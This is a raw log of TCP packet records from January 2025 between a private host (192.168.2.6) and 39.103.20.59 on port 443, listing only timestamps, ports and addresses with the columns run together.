                                                  Jan 2, 2025 12:14:03.421540022 CET4434994639.103.20.59192.168.2.6
                                                  Jan 2, 2025 12:14:03.421631098 CET49946443192.168.2.639.103.20.59
                                                  Jan 2, 2025 12:14:03.429975033 CET49946443192.168.2.639.103.20.59
                                                  Jan 2, 2025 12:14:03.429990053 CET4434994639.103.20.59192.168.2.6
                                                  Jan 2, 2025 12:14:04.663213968 CET4434994639.103.20.59192.168.2.6
                                                  Jan 2, 2025 12:14:04.663348913 CET49946443192.168.2.639.103.20.59
                                                  Jan 2, 2025 12:14:04.663861990 CET4434994639.103.20.59192.168.2.6
                                                  Jan 2, 2025 12:14:04.665617943 CET49946443192.168.2.639.103.20.59
                                                  Jan 2, 2025 12:14:04.714322090 CET49946443192.168.2.639.103.20.59
                                                  Jan 2, 2025 12:14:04.714329004 CET4434994639.103.20.59192.168.2.6
                                                  Jan 2, 2025 12:14:04.715065956 CET4434994639.103.20.59192.168.2.6
                                                  Jan 2, 2025 12:14:04.715154886 CET49946443192.168.2.639.103.20.59
                                                  Jan 2, 2025 12:14:04.716686010 CET49946443192.168.2.639.103.20.59
                                                  Jan 2, 2025 12:14:04.763320923 CET4434994639.103.20.59192.168.2.6
                                                  Jan 2, 2025 12:14:05.025835991 CET4434994639.103.20.59192.168.2.6
                                                  Jan 2, 2025 12:14:05.025913954 CET4434994639.103.20.59192.168.2.6
                                                  Jan 2, 2025 12:14:05.025966883 CET49946443192.168.2.639.103.20.59
                                                  Jan 2, 2025 12:14:05.025993109 CET49946443192.168.2.639.103.20.59
                                                  Jan 2, 2025 12:14:05.033668041 CET49946443192.168.2.639.103.20.59
                                                  Jan 2, 2025 12:14:05.033689022 CET4434994639.103.20.59192.168.2.6
                                                  Jan 2, 2025 12:14:05.158961058 CET49957443192.168.2.639.103.20.59
                                                  Jan 2, 2025 12:14:05.159006119 CET4434995739.103.20.59192.168.2.6
                                                  Jan 2, 2025 12:14:05.159082890 CET49957443192.168.2.639.103.20.59
                                                  Jan 2, 2025 12:14:05.159277916 CET49957443192.168.2.639.103.20.59
                                                  Jan 2, 2025 12:14:05.159290075 CET4434995739.103.20.59192.168.2.6
                                                  Jan 2, 2025 12:14:06.447851896 CET4434995739.103.20.59192.168.2.6
                                                  Jan 2, 2025 12:14:06.448035955 CET49957443192.168.2.639.103.20.59
                                                  Jan 2, 2025 12:14:06.448539972 CET49957443192.168.2.639.103.20.59
                                                  Jan 2, 2025 12:14:06.448544979 CET4434995739.103.20.59192.168.2.6
                                                  Jan 2, 2025 12:14:06.448966980 CET49957443192.168.2.639.103.20.59
                                                  Jan 2, 2025 12:14:06.448971033 CET4434995739.103.20.59192.168.2.6
                                                  Jan 2, 2025 12:14:06.781879902 CET4434995739.103.20.59192.168.2.6
                                                  Jan 2, 2025 12:14:06.781900883 CET4434995739.103.20.59192.168.2.6
                                                  Jan 2, 2025 12:14:06.781935930 CET49957443192.168.2.639.103.20.59
                                                  Jan 2, 2025 12:14:06.781951904 CET4434995739.103.20.59192.168.2.6
                                                  Jan 2, 2025 12:14:06.781964064 CET49957443192.168.2.639.103.20.59
                                                  Jan 2, 2025 12:14:06.781996965 CET49957443192.168.2.639.103.20.59
                                                  Jan 2, 2025 12:14:06.782470942 CET4434995739.103.20.59192.168.2.6
                                                  Jan 2, 2025 12:14:06.782510042 CET4434995739.103.20.59192.168.2.6
                                                  Jan 2, 2025 12:14:06.782527924 CET49957443192.168.2.639.103.20.59
                                                  Jan 2, 2025 12:14:06.782532930 CET4434995739.103.20.59192.168.2.6
                                                  Jan 2, 2025 12:14:06.782578945 CET49957443192.168.2.639.103.20.59
                                                  Jan 2, 2025 12:14:06.782578945 CET49957443192.168.2.639.103.20.59
                                                  Jan 2, 2025 12:14:07.014260054 CET4434995739.103.20.59192.168.2.6
                                                  Jan 2, 2025 12:14:07.014386892 CET49957443192.168.2.639.103.20.59
                                                  Jan 2, 2025 12:14:07.014420033 CET4434995739.103.20.59192.168.2.6
                                                  Jan 2, 2025 12:14:07.014465094 CET49957443192.168.2.639.103.20.59
                                                  Jan 2, 2025 12:14:07.015080929 CET4434995739.103.20.59192.168.2.6
                                                  Jan 2, 2025 12:14:07.015134096 CET49957443192.168.2.639.103.20.59
                                                  Jan 2, 2025 12:14:07.015180111 CET4434995739.103.20.59192.168.2.6
                                                  Jan 2, 2025 12:14:07.015225887 CET49957443192.168.2.639.103.20.59
                                                  Jan 2, 2025 12:14:07.016001940 CET4434995739.103.20.59192.168.2.6
                                                  Jan 2, 2025 12:14:07.016052961 CET49957443192.168.2.639.103.20.59
                                                  Jan 2, 2025 12:14:07.016369104 CET4434995739.103.20.59192.168.2.6
                                                  Jan 2, 2025 12:14:07.016422987 CET49957443192.168.2.639.103.20.59
                                                  Jan 2, 2025 12:14:07.017241955 CET4434995739.103.20.59192.168.2.6
                                                  Jan 2, 2025 12:14:07.017297983 CET49957443192.168.2.639.103.20.59
                                                  Jan 2, 2025 12:14:07.258410931 CET4434995739.103.20.59192.168.2.6
                                                  Jan 2, 2025 12:14:07.258476019 CET49957443192.168.2.639.103.20.59
                                                  Jan 2, 2025 12:14:07.258655071 CET4434995739.103.20.59192.168.2.6
                                                  Jan 2, 2025 12:14:07.258704901 CET49957443192.168.2.639.103.20.59
                                                  Jan 2, 2025 12:14:07.258929014 CET4434995739.103.20.59192.168.2.6
                                                  Jan 2, 2025 12:14:07.258979082 CET49957443192.168.2.639.103.20.59
                                                  Jan 2, 2025 12:14:07.259212971 CET4434995739.103.20.59192.168.2.6
                                                  Jan 2, 2025 12:14:07.259270906 CET49957443192.168.2.639.103.20.59
                                                  Jan 2, 2025 12:14:07.259532928 CET4434995739.103.20.59192.168.2.6
                                                  Jan 2, 2025 12:14:07.259588003 CET49957443192.168.2.639.103.20.59
                                                  Jan 2, 2025 12:14:07.260092974 CET4434995739.103.20.59192.168.2.6
                                                  Jan 2, 2025 12:14:07.260129929 CET4434995739.103.20.59192.168.2.6
                                                  Jan 2, 2025 12:14:07.260153055 CET49957443192.168.2.639.103.20.59
                                                  Jan 2, 2025 12:14:07.260159016 CET4434995739.103.20.59192.168.2.6
                                                  Jan 2, 2025 12:14:07.260169029 CET49957443192.168.2.639.103.20.59
                                                  Jan 2, 2025 12:14:07.260196924 CET49957443192.168.2.639.103.20.59
                                                  Jan 2, 2025 12:14:07.260900021 CET4434995739.103.20.59192.168.2.6
                                                  Jan 2, 2025 12:14:07.260957956 CET49957443192.168.2.639.103.20.59
                                                  Jan 2, 2025 12:14:07.260981083 CET4434995739.103.20.59192.168.2.6
                                                  Jan 2, 2025 12:14:07.261024952 CET49957443192.168.2.639.103.20.59
                                                  Jan 2, 2025 12:14:07.261081934 CET4434995739.103.20.59192.168.2.6
                                                  Jan 2, 2025 12:14:07.261130095 CET49957443192.168.2.639.103.20.59
                                                  Jan 2, 2025 12:14:07.261887074 CET4434995739.103.20.59192.168.2.6
                                                  Jan 2, 2025 12:14:07.261934996 CET4434995739.103.20.59192.168.2.6
                                                  Jan 2, 2025 12:14:07.261946917 CET49957443192.168.2.639.103.20.59
                                                  Jan 2, 2025 12:14:07.261950970 CET4434995739.103.20.59192.168.2.6
                                                  Jan 2, 2025 12:14:07.261981010 CET49957443192.168.2.639.103.20.59
                                                  Jan 2, 2025 12:14:07.261998892 CET49957443192.168.2.639.103.20.59
                                                  Jan 2, 2025 12:14:07.262840033 CET4434995739.103.20.59192.168.2.6
                                                  Jan 2, 2025 12:14:07.262867928 CET4434995739.103.20.59192.168.2.6
                                                  Jan 2, 2025 12:14:07.262895107 CET49957443192.168.2.639.103.20.59
                                                  Jan 2, 2025 12:14:07.262900114 CET4434995739.103.20.59192.168.2.6
                                                  Jan 2, 2025 12:14:07.262918949 CET49957443192.168.2.639.103.20.59
                                                  Jan 2, 2025 12:14:07.262940884 CET49957443192.168.2.639.103.20.59
                                                  Jan 2, 2025 12:14:07.508554935 CET4434995739.103.20.59192.168.2.6
                                                  Jan 2, 2025 12:14:07.508611917 CET4434995739.103.20.59192.168.2.6
                                                  Jan 2, 2025 12:14:07.508708000 CET4434995739.103.20.59192.168.2.6
                                                  Jan 2, 2025 12:14:07.508748055 CET49957443192.168.2.639.103.20.59
                                                  Jan 2, 2025 12:14:07.508748055 CET49957443192.168.2.639.103.20.59
                                                  Jan 2, 2025 12:14:07.508768082 CET4434995739.103.20.59192.168.2.6
                                                  Jan 2, 2025 12:14:07.508799076 CET49957443192.168.2.639.103.20.59
                                                  Jan 2, 2025 12:14:07.508810043 CET49957443192.168.2.639.103.20.59
                                                  Jan 2, 2025 12:14:07.508827925 CET4434995739.103.20.59192.168.2.6
                                                  Jan 2, 2025 12:14:07.508858919 CET4434995739.103.20.59192.168.2.6
                                                  Jan 2, 2025 12:14:07.508869886 CET49957443192.168.2.639.103.20.59
                                                  Jan 2, 2025 12:14:07.508873940 CET4434995739.103.20.59192.168.2.6
                                                  Jan 2, 2025 12:14:07.508912086 CET49957443192.168.2.639.103.20.59
                                                  Jan 2, 2025 12:14:07.509089947 CET4434995739.103.20.59192.168.2.6
                                                  Jan 2, 2025 12:14:07.509144068 CET49957443192.168.2.639.103.20.59
                                                  Jan 2, 2025 12:14:07.509146929 CET4434995739.103.20.59192.168.2.6
                                                  Jan 2, 2025 12:14:07.509156942 CET4434995739.103.20.59192.168.2.6
                                                  Jan 2, 2025 12:14:07.509195089 CET49957443192.168.2.639.103.20.59
                                                  Jan 2, 2025 12:14:07.509205103 CET49957443192.168.2.639.103.20.59
                                                  Jan 2, 2025 12:14:07.509320974 CET4434995739.103.20.59192.168.2.6
                                                  Jan 2, 2025 12:14:07.509351015 CET4434995739.103.20.59192.168.2.6
                                                  Jan 2, 2025 12:14:07.509366989 CET49957443192.168.2.639.103.20.59
                                                  Jan 2, 2025 12:14:07.509371042 CET4434995739.103.20.59192.168.2.6
                                                  Jan 2, 2025 12:14:07.509399891 CET49957443192.168.2.639.103.20.59
                                                  Jan 2, 2025 12:14:07.509407043 CET49957443192.168.2.639.103.20.59
                                                  Jan 2, 2025 12:14:07.509409904 CET4434995739.103.20.59192.168.2.6
                                                  Jan 2, 2025 12:14:07.509449959 CET49957443192.168.2.639.103.20.59
                                                  Jan 2, 2025 12:14:07.509450912 CET4434995739.103.20.59192.168.2.6
                                                  Jan 2, 2025 12:14:07.509500027 CET49957443192.168.2.639.103.20.59
                                                  Jan 2, 2025 12:14:07.511610031 CET49957443192.168.2.639.103.20.59
                                                  Jan 2, 2025 12:14:07.511636019 CET4434995739.103.20.59192.168.2.6
                                                  Jan 2, 2025 12:14:07.546425104 CET49974443192.168.2.639.103.20.59
                                                  Jan 2, 2025 12:14:07.546466112 CET4434997439.103.20.59192.168.2.6
                                                  Jan 2, 2025 12:14:07.546552896 CET49974443192.168.2.639.103.20.59
                                                  Jan 2, 2025 12:14:07.546727896 CET49974443192.168.2.639.103.20.59
                                                  Jan 2, 2025 12:14:07.546744108 CET4434997439.103.20.59192.168.2.6
                                                  Jan 2, 2025 12:14:08.799942017 CET4434997439.103.20.59192.168.2.6
                                                  Jan 2, 2025 12:14:08.800029039 CET49974443192.168.2.639.103.20.59
                                                  Jan 2, 2025 12:14:08.800401926 CET49974443192.168.2.639.103.20.59
                                                  Jan 2, 2025 12:14:08.800409079 CET4434997439.103.20.59192.168.2.6
                                                  Jan 2, 2025 12:14:08.800559998 CET49974443192.168.2.639.103.20.59
                                                  Jan 2, 2025 12:14:08.800564051 CET4434997439.103.20.59192.168.2.6
                                                  Jan 2, 2025 12:14:09.133304119 CET4434997439.103.20.59192.168.2.6
                                                  Jan 2, 2025 12:14:09.133336067 CET4434997439.103.20.59192.168.2.6
                                                  Jan 2, 2025 12:14:09.133392096 CET49974443192.168.2.639.103.20.59
                                                  Jan 2, 2025 12:14:09.133408070 CET4434997439.103.20.59192.168.2.6
                                                  Jan 2, 2025 12:14:09.133421898 CET49974443192.168.2.639.103.20.59
                                                  Jan 2, 2025 12:14:09.133491993 CET49974443192.168.2.639.103.20.59
                                                  Jan 2, 2025 12:14:09.133877993 CET4434997439.103.20.59192.168.2.6
                                                  Jan 2, 2025 12:14:09.133946896 CET49974443192.168.2.639.103.20.59
                                                  Jan 2, 2025 12:14:09.134111881 CET4434997439.103.20.59192.168.2.6
                                                  Jan 2, 2025 12:14:09.134176970 CET49974443192.168.2.639.103.20.59
                                                  Jan 2, 2025 12:14:09.378770113 CET4434997439.103.20.59192.168.2.6
                                                  Jan 2, 2025 12:14:09.378916979 CET49974443192.168.2.639.103.20.59
                                                  Jan 2, 2025 12:14:09.379334927 CET4434997439.103.20.59192.168.2.6
                                                  Jan 2, 2025 12:14:09.379405022 CET49974443192.168.2.639.103.20.59
                                                  Jan 2, 2025 12:14:09.379710913 CET4434997439.103.20.59192.168.2.6
                                                  Jan 2, 2025 12:14:09.379770041 CET49974443192.168.2.639.103.20.59
                                                  Jan 2, 2025 12:14:09.380335093 CET4434997439.103.20.59192.168.2.6
                                                  Jan 2, 2025 12:14:09.380367994 CET4434997439.103.20.59192.168.2.6
                                                  Jan 2, 2025 12:14:09.380399942 CET49974443192.168.2.639.103.20.59
                                                  Jan 2, 2025 12:14:09.380409956 CET4434997439.103.20.59192.168.2.6
                                                  Jan 2, 2025 12:14:09.380436897 CET49974443192.168.2.639.103.20.59
                                                  Jan 2, 2025 12:14:09.380454063 CET49974443192.168.2.639.103.20.59
                                                  Jan 2, 2025 12:14:09.381227970 CET4434997439.103.20.59192.168.2.6
                                                  Jan 2, 2025 12:14:09.381288052 CET49974443192.168.2.639.103.20.59
                                                  Jan 2, 2025 12:14:09.381400108 CET4434997439.103.20.59192.168.2.6
                                                  Jan 2, 2025 12:14:09.381453991 CET49974443192.168.2.639.103.20.59
                                                  Jan 2, 2025 12:14:09.607768059 CET4434997439.103.20.59192.168.2.6
                                                  Jan 2, 2025 12:14:09.607839108 CET49974443192.168.2.639.103.20.59
                                                  Jan 2, 2025 12:14:09.608048916 CET4434997439.103.20.59192.168.2.6
                                                  Jan 2, 2025 12:14:09.608103991 CET49974443192.168.2.639.103.20.59
                                                  Jan 2, 2025 12:14:09.608462095 CET4434997439.103.20.59192.168.2.6
                                                  Jan 2, 2025 12:14:09.608493090 CET4434997439.103.20.59192.168.2.6
                                                  Jan 2, 2025 12:14:09.608508110 CET49974443192.168.2.639.103.20.59
                                                  Jan 2, 2025 12:14:09.608513117 CET4434997439.103.20.59192.168.2.6
                                                  Jan 2, 2025 12:14:09.608547926 CET49974443192.168.2.639.103.20.59
                                                  Jan 2, 2025 12:14:09.608570099 CET49974443192.168.2.639.103.20.59
                                                  Jan 2, 2025 12:14:09.608952045 CET4434997439.103.20.59192.168.2.6
                                                  Jan 2, 2025 12:14:09.608992100 CET4434997439.103.20.59192.168.2.6
                                                  Jan 2, 2025 12:14:09.609065056 CET49974443192.168.2.639.103.20.59
                                                  Jan 2, 2025 12:14:09.609071016 CET4434997439.103.20.59192.168.2.6
                                                  Jan 2, 2025 12:14:09.609112978 CET49974443192.168.2.639.103.20.59
                                                  Jan 2, 2025 12:14:09.609808922 CET4434997439.103.20.59192.168.2.6
                                                  Jan 2, 2025 12:14:09.609860897 CET49974443192.168.2.639.103.20.59
                                                  Jan 2, 2025 12:14:09.609877110 CET4434997439.103.20.59192.168.2.6
                                                  Jan 2, 2025 12:14:09.609924078 CET49974443192.168.2.639.103.20.59
                                                  Jan 2, 2025 12:14:09.610034943 CET4434997439.103.20.59192.168.2.6
                                                  Jan 2, 2025 12:14:09.610080957 CET49974443192.168.2.639.103.20.59
                                                  Jan 2, 2025 12:14:09.610734940 CET4434997439.103.20.59192.168.2.6
                                                  Jan 2, 2025 12:14:09.610785961 CET49974443192.168.2.639.103.20.59
                                                  Jan 2, 2025 12:14:09.610833883 CET4434997439.103.20.59192.168.2.6
                                                  Jan 2, 2025 12:14:09.610878944 CET49974443192.168.2.639.103.20.59
                                                  Jan 2, 2025 12:14:09.610996008 CET4434997439.103.20.59192.168.2.6
                                                  Jan 2, 2025 12:14:09.611037016 CET49974443192.168.2.639.103.20.59
                                                  Jan 2, 2025 12:14:09.611746073 CET4434997439.103.20.59192.168.2.6
                                                  Jan 2, 2025 12:14:09.611795902 CET49974443192.168.2.639.103.20.59
                                                  Jan 2, 2025 12:14:09.611854076 CET4434997439.103.20.59192.168.2.6
                                                  Jan 2, 2025 12:14:09.611896992 CET49974443192.168.2.639.103.20.59
                                                  Jan 2, 2025 12:14:09.837007999 CET4434997439.103.20.59192.168.2.6
                                                  Jan 2, 2025 12:14:09.837054968 CET4434997439.103.20.59192.168.2.6
                                                  Jan 2, 2025 12:14:09.837093115 CET4434997439.103.20.59192.168.2.6
                                                  Jan 2, 2025 12:14:09.837248087 CET49974443192.168.2.639.103.20.59
                                                  Jan 2, 2025 12:14:09.837248087 CET49974443192.168.2.639.103.20.59
                                                  Jan 2, 2025 12:14:09.837274075 CET4434997439.103.20.59192.168.2.6
                                                  Jan 2, 2025 12:14:09.837291002 CET4434997439.103.20.59192.168.2.6
                                                  Jan 2, 2025 12:14:09.837346077 CET49974443192.168.2.639.103.20.59
                                                  Jan 2, 2025 12:14:09.837353945 CET4434997439.103.20.59192.168.2.6
                                                  Jan 2, 2025 12:14:09.837399960 CET49974443192.168.2.639.103.20.59
                                                  Jan 2, 2025 12:14:09.837440014 CET4434997439.103.20.59192.168.2.6
                                                  Jan 2, 2025 12:14:09.837469101 CET4434997439.103.20.59192.168.2.6
                                                  Jan 2, 2025 12:14:09.837492943 CET49974443192.168.2.639.103.20.59
                                                  Jan 2, 2025 12:14:09.837498903 CET4434997439.103.20.59192.168.2.6
                                                  Jan 2, 2025 12:14:09.837527990 CET49974443192.168.2.639.103.20.59
                                                  Jan 2, 2025 12:14:09.837537050 CET4434997439.103.20.59192.168.2.6
                                                  Jan 2, 2025 12:14:09.837553024 CET49974443192.168.2.639.103.20.59
                                                  Jan 2, 2025 12:14:09.837590933 CET49974443192.168.2.639.103.20.59
                                                  Jan 2, 2025 12:14:09.839426041 CET49974443192.168.2.639.103.20.59
                                                  Jan 2, 2025 12:14:09.839448929 CET4434997439.103.20.59192.168.2.6
                                                  Jan 2, 2025 12:14:09.883006096 CET49983443192.168.2.639.103.20.59
                                                  Jan 2, 2025 12:14:09.883050919 CET4434998339.103.20.59192.168.2.6
                                                  Jan 2, 2025 12:14:09.883152962 CET49983443192.168.2.639.103.20.59
                                                  Jan 2, 2025 12:14:09.883464098 CET49983443192.168.2.639.103.20.59
                                                  Jan 2, 2025 12:14:09.883475065 CET4434998339.103.20.59192.168.2.6
                                                  Jan 2, 2025 12:14:11.211224079 CET4434998339.103.20.59192.168.2.6
                                                  Jan 2, 2025 12:14:11.211332083 CET49983443192.168.2.639.103.20.59
                                                  Jan 2, 2025 12:14:11.211906910 CET49983443192.168.2.639.103.20.59
                                                  Jan 2, 2025 12:14:11.211930037 CET4434998339.103.20.59192.168.2.6
                                                  Jan 2, 2025 12:14:11.212131977 CET49983443192.168.2.639.103.20.59
                                                  Jan 2, 2025 12:14:11.212137938 CET4434998339.103.20.59192.168.2.6
                                                  Jan 2, 2025 12:14:11.691905975 CET4434998339.103.20.59192.168.2.6
                                                  Jan 2, 2025 12:14:11.691937923 CET4434998339.103.20.59192.168.2.6
                                                  Jan 2, 2025 12:14:11.691981077 CET4434998339.103.20.59192.168.2.6
                                                  Jan 2, 2025 12:14:11.692022085 CET4434998339.103.20.59192.168.2.6
                                                  Jan 2, 2025 12:14:11.692109108 CET4434998339.103.20.59192.168.2.6
                                                  Jan 2, 2025 12:14:11.692230940 CET49983443192.168.2.639.103.20.59
                                                  Jan 2, 2025 12:14:11.692230940 CET49983443192.168.2.639.103.20.59
                                                  Jan 2, 2025 12:14:11.693342924 CET49983443192.168.2.639.103.20.59
                                                  Jan 2, 2025 12:14:11.693362951 CET4434998339.103.20.59192.168.2.6
                                                  Jan 2, 2025 12:14:11.707532883 CET49984443192.168.2.639.103.20.59
                                                  Jan 2, 2025 12:14:11.707583904 CET4434998439.103.20.59192.168.2.6
                                                  Jan 2, 2025 12:14:11.707667112 CET49984443192.168.2.639.103.20.59
                                                  Jan 2, 2025 12:14:11.707909107 CET49984443192.168.2.639.103.20.59
                                                  Jan 2, 2025 12:14:11.707917929 CET4434998439.103.20.59192.168.2.6
                                                  Jan 2, 2025 12:14:12.907279015 CET4434998439.103.20.59192.168.2.6
                                                  Jan 2, 2025 12:14:12.907551050 CET49984443192.168.2.639.103.20.59
                                                  Jan 2, 2025 12:14:12.908375025 CET49984443192.168.2.639.103.20.59
                                                  Jan 2, 2025 12:14:12.908384085 CET4434998439.103.20.59192.168.2.6
                                                  Jan 2, 2025 12:14:12.908720016 CET49984443192.168.2.639.103.20.59
                                                  Jan 2, 2025 12:14:12.908725023 CET4434998439.103.20.59192.168.2.6
                                                  Jan 2, 2025 12:14:13.218048096 CET4434998439.103.20.59192.168.2.6
                                                  Jan 2, 2025 12:14:13.218071938 CET4434998439.103.20.59192.168.2.6
                                                  Jan 2, 2025 12:14:13.218153954 CET49984443192.168.2.639.103.20.59
                                                  Jan 2, 2025 12:14:13.218178988 CET4434998439.103.20.59192.168.2.6
                                                  Jan 2, 2025 12:14:13.218285084 CET4434998439.103.20.59192.168.2.6
                                                  Jan 2, 2025 12:14:13.218328953 CET49984443192.168.2.639.103.20.59
                                                  Jan 2, 2025 12:14:13.218333960 CET4434998439.103.20.59192.168.2.6
                                                  Jan 2, 2025 12:14:13.218373060 CET49984443192.168.2.639.103.20.59
                                                  Jan 2, 2025 12:14:13.219785929 CET4434998439.103.20.59192.168.2.6
                                                  Jan 2, 2025 12:14:13.219840050 CET49984443192.168.2.639.103.20.59
                                                  Jan 2, 2025 12:14:13.223475933 CET4434998439.103.20.59192.168.2.6
                                                  Jan 2, 2025 12:14:13.223541975 CET49984443192.168.2.639.103.20.59
                                                  Jan 2, 2025 12:14:13.304600954 CET4434998439.103.20.59192.168.2.6
                                                  Jan 2, 2025 12:14:13.304701090 CET49984443192.168.2.639.103.20.59
                                                  Jan 2, 2025 12:14:13.304717064 CET4434998439.103.20.59192.168.2.6
                                                  Jan 2, 2025 12:14:13.304884911 CET49984443192.168.2.639.103.20.59
                                                  Jan 2, 2025 12:14:13.305064917 CET4434998439.103.20.59192.168.2.6
                                                  Jan 2, 2025 12:14:13.305114031 CET49984443192.168.2.639.103.20.59
                                                  Jan 2, 2025 12:14:13.305571079 CET4434998439.103.20.59192.168.2.6
                                                  Jan 2, 2025 12:14:13.305619955 CET49984443192.168.2.639.103.20.59
                                                  Jan 2, 2025 12:14:13.306401968 CET4434998439.103.20.59192.168.2.6
                                                  Jan 2, 2025 12:14:13.306449890 CET49984443192.168.2.639.103.20.59
                                                  Jan 2, 2025 12:14:13.306940079 CET4434998439.103.20.59192.168.2.6
                                                  Jan 2, 2025 12:14:13.306987047 CET49984443192.168.2.639.103.20.59
                                                  Jan 2, 2025 12:14:13.308320999 CET4434998439.103.20.59192.168.2.6
                                                  Jan 2, 2025 12:14:13.308367968 CET49984443192.168.2.639.103.20.59
                                                  Jan 2, 2025 12:14:13.308571100 CET4434998439.103.20.59192.168.2.6
                                                  Jan 2, 2025 12:14:13.308614016 CET49984443192.168.2.639.103.20.59
                                                  Jan 2, 2025 12:14:13.310259104 CET4434998439.103.20.59192.168.2.6
                                                  Jan 2, 2025 12:14:13.310312986 CET49984443192.168.2.639.103.20.59
                                                  Jan 2, 2025 12:14:13.391295910 CET4434998439.103.20.59192.168.2.6
                                                  Jan 2, 2025 12:14:13.391365051 CET4434998439.103.20.59192.168.2.6
                                                  Jan 2, 2025 12:14:13.391417027 CET49984443192.168.2.639.103.20.59
                                                  Jan 2, 2025 12:14:13.391422987 CET4434998439.103.20.59192.168.2.6
                                                  Jan 2, 2025 12:14:13.391433001 CET4434998439.103.20.59192.168.2.6
                                                  Jan 2, 2025 12:14:13.391459942 CET49984443192.168.2.639.103.20.59
                                                  Jan 2, 2025 12:14:13.391521931 CET49984443192.168.2.639.103.20.59
                                                  Jan 2, 2025 12:14:13.391805887 CET4434998439.103.20.59192.168.2.6
                                                  Jan 2, 2025 12:14:13.391849041 CET49984443192.168.2.639.103.20.59
                                                  Jan 2, 2025 12:14:13.392155886 CET4434998439.103.20.59192.168.2.6
                                                  Jan 2, 2025 12:14:13.392210960 CET49984443192.168.2.639.103.20.59
                                                  Jan 2, 2025 12:14:13.392254114 CET4434998439.103.20.59192.168.2.6
                                                  Jan 2, 2025 12:14:13.392292976 CET49984443192.168.2.639.103.20.59
                                                  Jan 2, 2025 12:14:13.392627954 CET4434998439.103.20.59192.168.2.6
                                                  Jan 2, 2025 12:14:13.392669916 CET49984443192.168.2.639.103.20.59
                                                  Jan 2, 2025 12:14:13.392810106 CET4434998439.103.20.59192.168.2.6
                                                  Jan 2, 2025 12:14:13.392849922 CET49984443192.168.2.639.103.20.59
                                                  Jan 2, 2025 12:14:13.392913103 CET4434998439.103.20.59192.168.2.6
                                                  Jan 2, 2025 12:14:13.392949104 CET49984443192.168.2.639.103.20.59
                                                  Jan 2, 2025 12:14:13.392973900 CET4434998439.103.20.59192.168.2.6
                                                  Jan 2, 2025 12:14:13.393013954 CET49984443192.168.2.639.103.20.59
                                                  Jan 2, 2025 12:14:13.393609047 CET4434998439.103.20.59192.168.2.6
                                                  Jan 2, 2025 12:14:13.393774986 CET49984443192.168.2.639.103.20.59
                                                  Jan 2, 2025 12:14:13.393779993 CET4434998439.103.20.59192.168.2.6
                                                  Jan 2, 2025 12:14:13.393826962 CET49984443192.168.2.639.103.20.59
                                                  Jan 2, 2025 12:14:13.394076109 CET4434998439.103.20.59192.168.2.6
                                                  Jan 2, 2025 12:14:13.394133091 CET49984443192.168.2.639.103.20.59
                                                  Jan 2, 2025 12:14:13.395438910 CET4434998439.103.20.59192.168.2.6
                                                  Jan 2, 2025 12:14:13.395499945 CET49984443192.168.2.639.103.20.59
                                                  Jan 2, 2025 12:14:13.396868944 CET4434998439.103.20.59192.168.2.6
                                                  Jan 2, 2025 12:14:13.396930933 CET49984443192.168.2.639.103.20.59
                                                  Jan 2, 2025 12:14:13.396982908 CET4434998439.103.20.59192.168.2.6
                                                  Jan 2, 2025 12:14:13.397025108 CET49984443192.168.2.639.103.20.59
                                                  Jan 2, 2025 12:14:13.478185892 CET4434998439.103.20.59192.168.2.6
                                                  Jan 2, 2025 12:14:13.478235960 CET4434998439.103.20.59192.168.2.6
                                                  Jan 2, 2025 12:14:13.478271961 CET49984443192.168.2.639.103.20.59
                                                  Jan 2, 2025 12:14:13.478291988 CET4434998439.103.20.59192.168.2.6
                                                  Jan 2, 2025 12:14:13.478306055 CET49984443192.168.2.639.103.20.59
                                                  Jan 2, 2025 12:14:13.478307009 CET4434998439.103.20.59192.168.2.6
                                                  Jan 2, 2025 12:14:13.478349924 CET49984443192.168.2.639.103.20.59
                                                  Jan 2, 2025 12:14:13.478354931 CET4434998439.103.20.59192.168.2.6
                                                  Jan 2, 2025 12:14:13.478389978 CET49984443192.168.2.639.103.20.59
                                                  Jan 2, 2025 12:14:13.478406906 CET4434998439.103.20.59192.168.2.6
                                                  Jan 2, 2025 12:14:13.478456974 CET49984443192.168.2.639.103.20.59
                                                  Jan 2, 2025 12:14:13.478548050 CET4434998439.103.20.59192.168.2.6
                                                  Jan 2, 2025 12:14:13.478591919 CET49984443192.168.2.639.103.20.59
                                                  Jan 2, 2025 12:14:13.478658915 CET4434998439.103.20.59192.168.2.6
                                                  Jan 2, 2025 12:14:13.478708029 CET49984443192.168.2.639.103.20.59
                                                  Jan 2, 2025 12:14:13.478806973 CET4434998439.103.20.59192.168.2.6
                                                  Jan 2, 2025 12:14:13.478862047 CET49984443192.168.2.639.103.20.59
                                                  Jan 2, 2025 12:14:13.478903055 CET4434998439.103.20.59192.168.2.6
                                                  Jan 2, 2025 12:14:13.478952885 CET49984443192.168.2.639.103.20.59
                                                  Jan 2, 2025 12:14:13.479074955 CET4434998439.103.20.59192.168.2.6
                                                  Jan 2, 2025 12:14:13.479120970 CET49984443192.168.2.639.103.20.59
                                                  Jan 2, 2025 12:14:13.479146957 CET4434998439.103.20.59192.168.2.6
                                                  Jan 2, 2025 12:14:13.479192972 CET49984443192.168.2.639.103.20.59
                                                  Jan 2, 2025 12:14:13.479346037 CET4434998439.103.20.59192.168.2.6
                                                  Jan 2, 2025 12:14:13.479393959 CET49984443192.168.2.639.103.20.59
                                                  Jan 2, 2025 12:14:13.479465008 CET4434998439.103.20.59192.168.2.6
                                                  Jan 2, 2025 12:14:13.479516983 CET49984443192.168.2.639.103.20.59
                                                  Jan 2, 2025 12:14:13.479634047 CET4434998439.103.20.59192.168.2.6
                                                  Jan 2, 2025 12:14:13.479661942 CET4434998439.103.20.59192.168.2.6
                                                  Jan 2, 2025 12:14:13.479680061 CET49984443192.168.2.639.103.20.59
                                                  Jan 2, 2025 12:14:13.479685068 CET4434998439.103.20.59192.168.2.6
                                                  Jan 2, 2025 12:14:13.479700089 CET49984443192.168.2.639.103.20.59
                                                  Jan 2, 2025 12:14:13.479717970 CET49984443192.168.2.639.103.20.59
                                                  Jan 2, 2025 12:14:13.479846001 CET4434998439.103.20.59192.168.2.6
                                                  Jan 2, 2025 12:14:13.479892015 CET49984443192.168.2.639.103.20.59
                                                  Jan 2, 2025 12:14:13.483227968 CET4434998439.103.20.59192.168.2.6
                                                  Jan 2, 2025 12:14:13.483273029 CET4434998439.103.20.59192.168.2.6
                                                  Jan 2, 2025 12:14:13.483294010 CET49984443192.168.2.639.103.20.59
                                                  Jan 2, 2025 12:14:13.483303070 CET4434998439.103.20.59192.168.2.6
                                                  Jan 2, 2025 12:14:13.483329058 CET49984443192.168.2.639.103.20.59
